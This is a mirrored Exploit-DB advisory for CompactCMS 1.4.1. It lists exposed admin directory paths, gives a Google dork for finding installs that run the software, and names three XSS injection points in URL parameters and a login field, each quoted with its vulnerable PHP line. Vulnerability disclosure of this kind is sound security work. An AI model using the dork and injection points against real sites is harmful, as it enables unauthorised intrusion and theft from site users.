bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/15996.txt
Offensive Security 36c084c351 DB: 2021-09-03 
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

72 lines
No EOL
2.4 KiB
Text
Raw Blame History

# Exploit Title: CompactCMS 1.4.1 Multiple Vulnerabilities
# Google Dork: intext:"Maintained with CompactCMS.nl" intitle:"Print: *"
# Date: 17-12-2010
# Author: NLSecurity
# Software Link: http://files.compactcms.nl/stable/
# Version: CompactCMS 1.4.1
# Credits: http://www.nlsecurity.org/
# Extra: irc.6667.eu #main
Description:
CompactCMS 1.4.1 has multiple XSS and File Disclosure vulnerabilities. These file disclosures will
appear if the users have access to view open directories.
--- File Disclosures ---
/admin/includes/modules/backup-restore/
/admin/includes/modules/backup-restore/content-owners/
/admin/includes/modules/backup-restore/module-management/
/admin/includes/modules/backup-restore/permissions/
/admin/includes/modules/backup-restore/template-editor/
/admin/includes/modules/backup-restore/user-management/
/admin/includes/fancyupload/
/admin/includes/fancyupload/Assets/
/admin/includes/fancyupload/Assets/Icons/
/admin/includes/fancyupload/Backend/
/admin/includes/fancyupload/Backend/Assets/
/admin/includes/fancyupload/Backend/Assets/getid3/
/admin/includes/fancyupload/Language/
/admin/includes/fancyupload/Source/
/admin/includes/fancyupload/Source/Uploader/
/admin/includes/edit_area/
/admin/includes/edit_area/images/
/admin/includes/edit_area/langs/
/admin/includes/edit_area/reg_syntax/
/admin/img/mochaui/
/admin/img/styles/
/admin/img/uploader/
/_docs/
... Perhaps more, but this should give an idea. :-)
--- Cross-Site Scripting Vulnerabilities (XSS) ---
/afdrukken.php?page=">[XSS]
This can be found on line 48:
<strong><a href="<?php echo $ccms['rootdir'];?><?php echo ($_GET['page']!=$cfg['homepage'])?$_GET['page'].'.html':null; ?>"><?php echo $ccms['lang']['system']['tooriginal']; ?></a></strong>
Vuln: $_GET['page']
---
/admin/includes/modules/permissions/permissions.Manage.php?status=notice&msg=[XSS]
This can be found on line 62:
<?php if(isset($_GET['msg'])) { echo '<span class="ss_sprite ss_confirm">'.$_GET['msg'].'</span>'; } ?>
Vuln: $_GET['msg']
---
/lib/includes/auth.inc.php
Username input field (userName) has an XSS vulnerability when using POST data.
This can be found on line 119:
<label for="userName"><?php echo $ccms['lang']['login']['username']; ?></label><input type="text" class="alt title" autofocus placeholder="username" name="userName" style="width:300px;" value="<?php echo (!empty($_POST['userName'])?$_POST['userName']:null);?>" id="userName" />
Vuln: $_POST['userName']
Reference in a new issue View git blame Copy permalink